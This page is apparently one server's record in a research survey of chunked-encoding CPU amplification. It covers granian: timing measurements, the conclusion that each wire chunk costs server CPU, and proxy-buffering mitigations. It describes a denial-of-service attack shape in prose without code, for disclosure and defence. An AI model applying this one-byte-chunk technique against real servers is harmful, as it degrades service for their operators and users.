chunkloris: granian
on this page
part of the chunkloris per-chunk amplification survey. this page is the per-server record for granian under http/1.1 chunked transfer encoding.
at a glance
- server: granian
1.x - runtime: python-3.12 (Rust core)
- ecosystem: python
- concurrency model: event-loop
- parser: Rust hyper internals exposed to Python
- delivery granularity:
per-chunk - chunk-limit helper: none exposed by the framework
- verdict: per-chunk — the parser/dispatcher boundary delivers one event per wire chunk. cpu cost under paced mode b is measurable per chunk.
- scaling exponent (mode a): 1.02 (wall time vs N, log-log slope across common cells)
- scaling exponent (mode b): 1.00
- notes: Rust core but the Rust->Python bridge adds per-chunk cost; ends up slower than pure-Python uvicorn-h11.
measurements
all cells run on a 1-vcpu docker container. cpu cost is derived from the target container’s cgroup v2 cpu.stat usage_usec delta around each cell.
| mode | N | wall (s) | server cpu % | µs / chunk | basis | ok |
|---|---|---|---|---|---|---|
A-bridge-coalesced | 50,000 | 0.888 | 104.6 | 18.570 | server-cpu-cgroup | ✓ |
A-bridge-coalesced | 100,000 | 1.951 | 102.1 | 19.924 | server-cpu-cgroup | ✓ |
A-bridge-coalesced | 250,000 | 4.636 | 100.1 | 18.569 | server-cpu-cgroup | ✓ |
A-bridge-coalesced | 500,000 | 7.490 | — | 14.980 | wall | ✓ |
A-bridge-coalesced | 1,000,000 | 14.400 | — | 14.400 | wall | ✓ |
B-paced-100us | 50,000 | 5.128 | 22.1 | 22.720 | server-cpu-cgroup | ✓ |
B-paced-100us | 100,000 | 10.244 | 21.7 | 22.219 | server-cpu-cgroup | ✓ |
B-paced-100us | 250,000 | 25.613 | 22.8 | 23.391 | server-cpu-cgroup | ✓ |
what this means
the parser/dispatcher path on this server delivers one event per chunked-transfer-encoding chunk, so an attacker who sends a body as N one-byte chunks consumes roughly N × (mode-b µs/chunk) of server cpu on a single core. amplification scales linearly with N until the framework’s max_request_body_size (or equivalent) is hit.
what to do today
- if this server runs as an origin behind nginx with the default
proxy_request_buffering on, the per-chunk attack shape does not reach this server — nginx delivers one content-length-framed body to the upstream in a singlerecv(). - if deployed direct-exposed, behind haproxy with default streaming, or behind any reverse proxy with
proxy_request_buffering off, the per-chunk cost reaches this server. - there is no framework-level chunk-count limit in the default config; use a frontend buffer, transport-layer rate limiting, or a wrapping middleware that imposes a chunk-count cap before draining the body.
reproducer
the full reproducer for this server is in the paper repo. the docker container pins granian 1.x and constrains the test container to a single cpu (--cpus=1). the prober script implements mode a (bridge-coalesced) and mode b (paced 100 µs) per the methodology section.
see the draft pdf for the full per-framework discussion.